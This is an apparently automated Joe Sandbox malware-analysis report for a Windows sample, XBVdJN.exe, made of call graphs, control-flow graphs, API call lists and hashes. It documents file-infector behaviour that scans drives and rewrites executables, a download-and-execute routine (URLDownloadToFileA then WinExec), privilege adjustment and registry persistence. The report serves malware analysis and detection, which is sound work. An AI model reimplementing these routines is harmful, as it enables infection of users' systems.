1278 6e1928 1277->1278 1281 6e1924 SetFilePointer CreateFileMappingA MapViewOfFile 1277->1281 1279 6e192e memset GetFileTime 1278->1279 1280 6e194f 1278->1280 1279->1281 1280->1281 1282 6e1954 SetFileTime 1280->1282 1281->1200 1281->1211 1282->1281 1284 6e1c9c 1283->1284 1286 6e1c94 1283->1286 1285 6e1cae memset memset 1284->1285 1284->1286 1285->1286 1286->1200 1287 6e185b GetSystemTimeAsFileTime srand rand srand rand 1286->1287 1287->1215 1290 6e1b93 1288->1290 1297 6e185b GetSystemTimeAsFileTime srand rand srand rand 1290->1297 1291 6e1bca srand 1292 6e1bd8 rand 1291->1292 1293 6e1c08 1292->1293 1293->1292 1294 6e1c29 memset memcpy lstrcat 1293->1294 1294->1236 1296->1238 1297->1291 1299 6e190c 1298->1299 1300 6e18e0 CloseHandle WaitForSingleObject 1298->1300 1299->1245 1299->1253 1301 6e18fb GetExitCodeProcess 1300->1301 1302 6e1907 CloseHandle 1300->1302 1301->1302 1302->1299 1312 6e185b GetSystemTimeAsFileTime srand rand srand rand 1303->1312 1305 6e27b5 wsprintfA CopyFileA 1306 6e27de wsprintfA 1305->1306 1307 6e2840 1305->1307 1308 6e1973 17 API calls 1306->1308 1307->1161 1309 6e280f 1308->1309 1310 6e2813 DeleteFileA 1309->1310 1311 6e2820 CreateFileA 1309->1311 1310->1311 1311->1307 1312->1305 1313->1095 1315 6e11c6 AdjustTokenPrivileges 1314->1315 1316 6e1200 CloseHandle 1314->1316 1317 6e11f6 1315->1317 1318 6e11f7 CloseHandle 1315->1318 1316->1103 1317->1318 1318->1316 1320 6e123f GetCurrentProcessId OpenProcess 1319->1320 1321 6e1310 1319->1321 1320->1321 1325 6e1262 1320->1325 1321->1101 1328 6e1319 1321->1328 1322 6e12b0 VirtualAlloc 1322->1325 1327 6e12b8 1322->1327 1323 6e12f1 CloseHandle 1323->1321 1324 6e1302 VirtualFree 1323->1324 1324->1321 1325->1322 1325->1323 1326 6e1296 VirtualFree 1325->1326 1325->1327 1326->1322 1327->1323 1329 6e134a 1328->1329 1330 6e132a GetModuleHandleA GetProcAddress 1328->1330 1331 6e1351 memset 1329->1331 1332 6e1363 1329->1332 1330->1329 1330->1332 1331->1332 1332->1101 1332->1109 1334 6e1196 1333->1334 1335 6e10ba 1333->1335 1335->1334 1351 6e185b GetSystemTimeAsFileTime srand rand srand rand 1335->1351 1337 6e1118 wsprintfA wsprintfA URLDownloadToFileA 1338 6e10dc 1337->1338 1339 6e1168 lstrlen Sleep 1337->1339 1342 6e1000 CreateFileA 1338->1342 1339->1335 1343 6e1025 GetFileSize CreateFileMappingA MapViewOfFile 1342->1343 1344 6e1092 WinExec lstrlen 1342->1344 1345 6e107b 1343->1345 1346 6e1057 1343->1346 1344->1334 1344->1335 1348 6e108d CloseHandle 1345->1348 1349 6e1087 CloseHandle 1345->1349 1347 6e1074 UnmapViewOfFile 1346->1347 1350 6e1061 1346->1350 1347->1345 1348->1344 1349->1348 1350->1347 1351->1337 1358 6e2361 1359 6e236b UnmapViewOfFile 1358->1359 1360 6e2374 1358->1360 1359->1360 1361 6e2379 CloseHandle 1360->1361 1362 6e2382 1360->1362 1361->1362 1363 6e2388 CloseHandle 1362->1363 1364 6e2391 1362->1364 1363->1364

                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                                          callgraph 0 Function_006E1E6E 1 Function_006E1C68 0->1 4 Function_006E2D60 0->4 9 Function_006E1AF9 0->9 11 Function_006E1DF6 0->11 21 Function_006E185B 0->21 33 Function_006E1D8A 0->33 34 Function_006E1B8A 0->34 42 Function_006E1C81 0->42 47 Function_006E2D9B 0->47 52 Function_006E1915 0->52 2 Function_006E29E2 25 Function_006E28B8 2->25 3 Function_006E6B63 24 Function_006E67A4 3->24 27 Function_006E6834 3->27 29 Function_006E69B0 3->29 5 Function_006E14E1 5->9 26 Function_006E1638 5->26 6 Function_006E2361 6->47 7 Function_006E2B7D 7->2 8 Function_006E6CF8 9->26 10 Function_006E6076 17 Function_006E66C8 10->17 12 Function_006E6CF2 12->8 13 Function_006E1973 13->21 14 Function_006E2CF0 15 Function_006E274A 15->13 15->21 16 Function_006E2C48 16->13 32 Function_006E2B8C 16->32 36 Function_006E6A84 17->36 37 Function_006E6B02 17->37 39 Function_006E6D00 17->39 18 Function_006E2845 18->15 45 Function_006E239D 18->45 53 Function_006E2692 18->53 19 Function_006E615C 19->17 20 Function_006E235D 22 Function_006E17D0 23 Function_006E65A6 25->0 25->2 25->45 25->53 26->16 26->22 40 Function_006E1581 26->40 44 Function_006E139F 26->44 48 Function_006E1718 26->48 49 Function_006E1099 26->49 28 Function_006E6734 28->36 28->37 28->39 30 Function_006E120E 31 Function_006E680F 32->7 32->18 34->21 35 Function_006E600A 36->12 36->31 37->3 38 Function_006E1000 38->22 39->3 39->12 39->29 40->21 41 Function_006E6001 41->35 43 Function_006E119F 44->30 44->43 50 Function_006E1319 44->50 45->2 46 Function_006E189D 45->46 45->52 48->14 49->21 49->38 51 Function_006E6014 54 Function_006E6012

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 101 6e29e2-6e2a34 memset wsprintfA 102 6e2abc-6e2b21 memset * 2 FindFirstFileA call 6e28b8 memset 101->102 103 6e2a3a-6e2a86 memset lstrlen lstrcpyn strrchr 101->103 110 6e2b61-6e2b6b FindNextFileA 102->110 103->102 104 6e2a88-6e2a98 103->104 104->102 106 6e2a9a-6e2aa7 lstrcmpiA 104->106 108 6e2aad-6e2aba lstrlen 106->108 109 6e2b74-6e2b7a 106->109 108->102 108->106 111 6e2b6d-6e2b6e FindClose 110->111 112 6e2b23-6e2b2a 110->112 111->109 113 6e2b4c-6e2b5c call 6e28b8 112->113 114 6e2b2c-6e2b33 112->114 113->110 114->113 115 6e2b35-6e2b4a lstrcmpiA 114->115 115->111 115->113
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                                                                                                                                                                                          • String ID: %s*$C:\$Documents and Settings
                                                                                                                                                                                                                          • API String ID: 2826467728-110786608
                                                                                                                                                                                                                          • Opcode ID: 672771061eaac4ed27b7828e7fd7d5003aac1ee6a7959da2ce106cd94b192d27
                                                                                                                                                                                                                          • Instruction ID: 15ad6856b5ed8d9dc1e95ccd42e638c65fb8f8c43b061eb8a52f8b5558d6c11e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 672771061eaac4ed27b7828e7fd7d5003aac1ee6a7959da2ce106cd94b192d27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 184175B28053CAAFD720DFA1DC8DDEB77AEEB84715F040829F544C7211E634D6488BA6

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 231 6e1718-6e1733 GetSystemTimeAsFileTime 232 6e1754-6e1758 231->232 233 6e1735-6e1752 SHSetValueA 231->233 234 6e17c6-6e17cd 232->234 235 6e175a-6e1784 SHGetValueA 232->235 233->234 235->234 236 6e1786-6e17b3 call 6e2cf0 * 2 235->236 236->234 241 6e17b5 236->241 242 6e17bf 241->242 243 6e17b7-6e17bd 241->243 242->234 243->234 243->242
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E1729
                                                                                                                                                                                                                          • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 006E174C
                                                                                                                                                                                                                          • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 006E177C
                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 006E1796
                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 006E17A8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: TimeValue__aulldiv$FileSystem
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe$SOFTWARE\GTplus$Time
                                                                                                                                                                                                                          • API String ID: 541852442-3754639035
                                                                                                                                                                                                                          • Opcode ID: 1d6315d914312ad6dd544bd340197fd468a31d81a03c58ea1a62a05c401a12e5
                                                                                                                                                                                                                          • Instruction ID: 9d8ae1be46d6af6323195dca3f353f2dab5d3e33249c5bf09559d9b29a7af4d6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d6315d914312ad6dd544bd340197fd468a31d81a03c58ea1a62a05c401a12e5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09116371A01399BBDF109A95CCC9FEF7BBEEB45F14F208119FA10AB240D6719A449B60

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 244 6e6076-6e6079 245 6e607b-6e6080 244->245 246 6e60e0-6e60eb 244->246 248 6e60f7-6e60f8 245->248 249 6e6082-6e6085 245->249 247 6e60ee-6e60f4 246->247 250 6e60f6 247->250 252 6e60fe-6e6106 248->252 253 6e60fa-6e60fc call 6e66c8 248->253 249->250 251 6e6087 249->251 250->248 251->247 254 6e6089-6e6095 251->254 256 6e6108-6e611d 252->256 257 6e6155-6e6189 VirtualFree 252->257 253->252 258 6e6097-6e609f 254->258 259 6e60a1-6e60aa 254->259 261 6e611f-6e6121 256->261 266 6e618c-6e6192 257->266 258->259 264 6e61ba-6e61c8 259->264 265 6e60b0-6e60c1 VirtualAlloc 259->265 262 6e6123 261->262 263 6e6151-6e6154 261->263 262->263 267 6e6125-6e6128 262->267 263->257 270 6e61ca-6e61d7 264->270 271 6e6243-6e6251 264->271 268 6e60c7-6e60cf 265->268 266->268 269 6e6198-6e61b0 VirtualFree 266->269 273 6e612a-6e612e 267->273 274 6e6134-6e613b 267->274 268->266 275 6e60d5-6e60df VirtualAlloc 268->275 269->264 278 6e61b2-6e61b4 269->278 272 6e61dd-6e61e0 270->272 276 6e6264-6e626f 271->276 277 6e6253 271->277 272->271 280 6e61e2-6e61f2 272->280 273->274 287 6e6130-6e6132 273->287 274->287 288 6e613d-6e614f 274->288 275->246 279 6e6271-6e6276 276->279 283 6e6255-6e6258 277->283 278->264 284 6e627c-6e6289 279->284 285 6e6389-6e63b1 VirtualProtect 279->285 286 6e61f5-6e61fe 280->286 283->276 289 6e625a-6e6262 283->289 300 6e628b 284->300 301 6e6292-6e6298 284->301 292 6e63b7-6e63ba 285->292 290 6e620c-6e6219 286->290 291 6e6200-6e6203 286->291 287->261 288->261 289->283 296 6e6238-6e623f 290->296 294 6e621b-6e6228 291->294 295 6e6205-6e6208 291->295 297 6e63fc-6e63ff VirtualProtect 292->297 298 6e63bc-6e63c2 292->298 294->296 302 6e622a-6e6236 295->302 303 6e620a 295->303 296->286 305 6e6241 296->305 299 6e6400-6e6416 297->299 298->298 304 6e63c4 298->304 306 6e6418-6e641d 299->306 307 6e6420-6e6425 299->307 300->301 308 6e62a2-6e62ac 301->308 302->296 303->296 304->297 309 6e63c6-6e63cf 304->309 305->272 310 6e62ae 308->310 311 6e62b1-6e62c8 308->311 312 6e63d4-6e63d8 309->312 313 6e63d1 309->313 310->311 314 6e62ce-6e62d4 311->314 315 6e6373-6e6384 311->315 316 6e63dd-6e63e1 312->316 317 6e63da 312->317 313->312 318 6e62da-6e62f1 314->318 319 6e62d6-6e62d9 314->319 315->279 320 6e63e7-6e63fa VirtualProtect 316->320 321 6e63e3 316->321 317->316 323 6e6365-6e636e 318->323 324 6e62f3-6e62f9 318->324 319->318 320->292 320->297 321->320 323->308 325 6e62fb-6e630f 324->325 326 6e6314-6e6326 324->326 327 6e6426-6e64a9 325->327 328 6e634c-6e6360 326->328 329 6e6328-6e634a 326->329 338 6e64ab-6e64c0 327->338 339 6e6519-6e651c 327->339 328->327 329->323 345 6e6535-6e6537 338->345 346 6e64c2 338->346 340 6e651d-6e651e 339->340 341 6e6583-6e6587 339->341 344 6e6522-6e6533 340->344 343 6e6588-6e658b 341->343 347 6e658d-6e658f 343->347 348 6e65a1-6e65a3 343->348 344->345 349 6e659a 345->349 350 6e6539 345->350 351 6e64f8 346->351 352 6e64c5-6e64cd 346->352 353 6e6591-6e6593 347->353 356 6e659b-6e659d 349->356 354 6e653b-6e6541 350->354 355 6e65b4 350->355 359 6e656c-6e656f 351->359 360 6e64fa-6e64fe 351->360 357 6e64cf-6e64d4 352->357 358 6e6542-6e6545 352->358 353->356 361 6e6595 353->361 354->358 366 6e65be-6e65db 355->366 356->353 362 6e659f 356->362 363 6e64d6-6e64d9 357->363 364 6e6517-6e6518 357->364 365 6e654d-6e6550 358->365 367 6e6572 359->367 360->367 368 6e6500 360->368 361->349 362->343 363->365 369 6e64db-6e64f5 363->369 364->339 365->366 370 6e6552-6e6556 365->370 376 6e65dd-6e65f6 366->376 372 6e6573-6e6576 367->372 368->344 373 6e6502 368->373 369->351 374 6e6578-6e657a 370->374 375 6e6558-6e6569 370->375 372->374 373->372 377 6e6504-6e6513 373->377 374->376 378 6e657c 374->378 375->359 380 6e65f7-6e6608 376->380 377->345 379 6e6515 377->379 378->380 381 6e657e-6e657f 378->381 379->364 381->341
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 006E60BE
                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 006E60DF
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 006E6189
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006E61A5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2087232378-0
                                                                                                                                                                                                                          • Opcode ID: bff829b531e851c4e2227540a62c9f882b47fe2ff8e0d4c5556c75c9ca75f639
                                                                                                                                                                                                                          • Instruction ID: b0f272fb2aab897f6260d37b9dff59cb204c38f4c9f16bfb7eb0672dacb88d6f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bff829b531e851c4e2227540a62c9f882b47fe2ff8e0d4c5556c75c9ca75f639
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B71246B260A7C58FDB328F25CC45BEA3BB2EF22350F18459DE9858B293D674A901C751

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 6e1e6e-6e1e95 call 6e2d60 3 6e1e9c-6e1eaa call 6e1df6 0->3 4 6e1e97 call 6e1d8a 0->4 8 6e2332 3->8 9 6e1eb0-6e1ed9 SetFileAttributesA CreateFileA 3->9 4->3 11 6e2338-6e233b 8->11 9->8 10 6e1edf-6e1f28 call 6e1915 SetFilePointer CreateFileMappingA MapViewOfFile 9->10 10->8 20 6e1f2e-6e1f39 10->20 13 6e233d-6e2340 UnmapViewOfFile 11->13 14 6e2346-6e2349 11->14 13->14 16 6e234b-6e234e CloseHandle 14->16 17 6e2350-6e2354 14->17 16->17 18 6e2356-6e235b CloseHandle 17->18 19 6e2391-6e239a call 6e2d9b 17->19 18->19 20->8 22 6e1f3f-6e1f56 20->22 22->8 24 6e1f5c-6e1f64 22->24 24->8 25 6e1f6a-6e1f70 24->25 25->8 26 6e1f76-6e1f87 call 6e1c81 25->26 26->8 29 6e1f8d-6e1fa7 call 6e185b call 6e1c81 26->29 29->8 34 6e1fad-6e1fb4 29->34 35 6e1fb6-6e1fc5 call 6e1af9 34->35 36 6e2024-6e2045 34->36 35->36 44 6e1fc7-6e1fd2 35->44 36->8 37 6e204b-6e204e 36->37 39 6e2070-6e20f4 call 6e1af9 * 2 call 6e1c68 * 2 memset * 2 37->39 40 6e2050-6e2053 37->40 62 6e20f5-6e20fe 39->62 42 6e2056-6e205a 40->42 42->39 45 6e205c-6e2061 42->45 44->8 47 6e1fd8-6e1fe7 44->47 45->8 48 6e2067-6e206e 45->48 50 6e1fef-6e2006 call 6e1af9 47->50 51 6e1fe9-6e1fec 47->51 48->42 57 6e2008-6e200e call 6e1c68 50->57 58 6e2013-6e201e FlushViewOfFile 50->58 51->50 57->58 58->36 63 6e2130-6e2139 62->63 64 6e2100-6e2114 62->64 67 6e213c-6e2142 63->67 65 6e212d-6e212e 64->65 66 6e2116-6e212a 64->66 65->62 66->65 68 6e215c 67->68 69 6e2144-6e2150 67->69 72 6e215f-6e2162 68->72 70 6e2157-6e215a 69->70 71 6e2152-6e2154 69->71 70->67 71->70 73 6e2164-6e2171 72->73 74 6e2181-6e2184 72->74 77 6e232a-6e232d 73->77 78 6e2177-6e217e 73->78 75 6e218d-6e21ba call 6e1c68 74->75 76 6e2186 74->76 81 6e21bc-6e21d0 call 6e1c68 75->81 82 6e21d3-6e220b call 6e1c81 call 6e1c68 75->82 76->75 77->72 78->74 81->82 89 6e220d-6e2218 call 6e1c68 82->89 90 6e221b-6e221e 82->90 89->90 91 6e2226-6e2328 memcpy UnmapViewOfFile CloseHandle call 6e1b8a call 6e185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 6e1915 CloseHandle 90->91 92 6e2220-6e2223 90->92 91->11 92->91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(?,00000080,?,006E32B0,00000164,006E2986,?), ref: 006E1EB9
                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 006E1ECD
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 006E1EF3
                                                                                                                                                                                                                          • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 006E1F07
                                                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000400), ref: 006E1F1D
                                                                                                                                                                                                                          • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 006E201E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E20D8
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E20EA
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 006E222D
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E2238
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E224A
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E22C6
                                                                                                                                                                                                                          • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E22CB
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E22DD
                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,006E4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E22F7
                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E230D
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E2322
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,?,006E32B0,00000164,006E2986,?), ref: 006E2340
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,006E32B0,00000164,006E2986,?), ref: 006E234E
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,?,006E32B0,00000164,006E2986,?), ref: 006E2359
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                                                                                                                                                                                                                          • String ID: .@n$5@n$<@n$C@n$m@n
                                                                                                                                                                                                                          • API String ID: 3043204753-1321908264
                                                                                                                                                                                                                          • Opcode ID: 48a47b44bc508adba4057191fd3d14c7fdd88c3994e91125c0e395144db87970
                                                                                                                                                                                                                          • Instruction ID: 0a770849c10bb49cccd4947d4b07c159c80870577e8ca4a1fed70afab47d1071
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48a47b44bc508adba4057191fd3d14c7fdd88c3994e91125c0e395144db87970
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CF15A71901389EFCB20DFA5DC94AADBBB6FF08314F104529E519AB2A1D734AE81CF54

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E2766
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E2774
                                                                                                                                                                                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 006E2787
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E27AB
                                                                                                                                                                                                                            • Part of subcall function 006E185B: GetSystemTimeAsFileTime.KERNEL32(006E1F92,00000000,?,00000000,?,?,?,006E1F92,?,00000000,00000002), ref: 006E1867
                                                                                                                                                                                                                            • Part of subcall function 006E185B: srand.MSVCRT ref: 006E1878
                                                                                                                                                                                                                            • Part of subcall function 006E185B: rand.MSVCRT ref: 006E1880
                                                                                                                                                                                                                            • Part of subcall function 006E185B: srand.MSVCRT ref: 006E1890
                                                                                                                                                                                                                            • Part of subcall function 006E185B: rand.MSVCRT ref: 006E1894
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E27C6
                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\4e06417b.exe,00000000), ref: 006E27D4
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E27F4
                                                                                                                                                                                                                            • Part of subcall function 006E1973: PathFileExistsA.KERNELBASE(\Nn`Nn,00000000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E1992
                                                                                                                                                                                                                            • Part of subcall function 006E1973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006E19BA
                                                                                                                                                                                                                            • Part of subcall function 006E1973: Sleep.KERNEL32(00000064), ref: 006E19C6
                                                                                                                                                                                                                            • Part of subcall function 006E1973: wsprintfA.USER32 ref: 006E19EC
                                                                                                                                                                                                                            • Part of subcall function 006E1973: CopyFileA.KERNEL32(?,?,00000000), ref: 006E1A00
                                                                                                                                                                                                                            • Part of subcall function 006E1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006E1A1E
                                                                                                                                                                                                                            • Part of subcall function 006E1973: GetFileSize.KERNEL32(?,00000000), ref: 006E1A2C
                                                                                                                                                                                                                            • Part of subcall function 006E1973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 006E1A46
                                                                                                                                                                                                                            • Part of subcall function 006E1973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 006E1A65
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,?,006E4E54,006E4E58), ref: 006E281A
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,006E4E54,006E4E58), ref: 006E2832
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                                                                                                                                                                                                          • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\4e06417b.exe$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                                                                                                                                                                                                          • API String ID: 692489704-4044589814
                                                                                                                                                                                                                          • Opcode ID: ad677d2139b14a203509f6f7a4a2b24136c5ba3775ea5bcdf050e65fd18ac8b4
                                                                                                                                                                                                                          • Instruction ID: fd91bf1356e2b27690344a0f65632a81657163e44cd9f9a9c4a26703b65f2d44
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad677d2139b14a203509f6f7a4a2b24136c5ba3775ea5bcdf050e65fd18ac8b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F2192B6D423AC7BDB10EBA69CCDFEB736EEB04704F0105A5B644E3141E6709F448AA0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
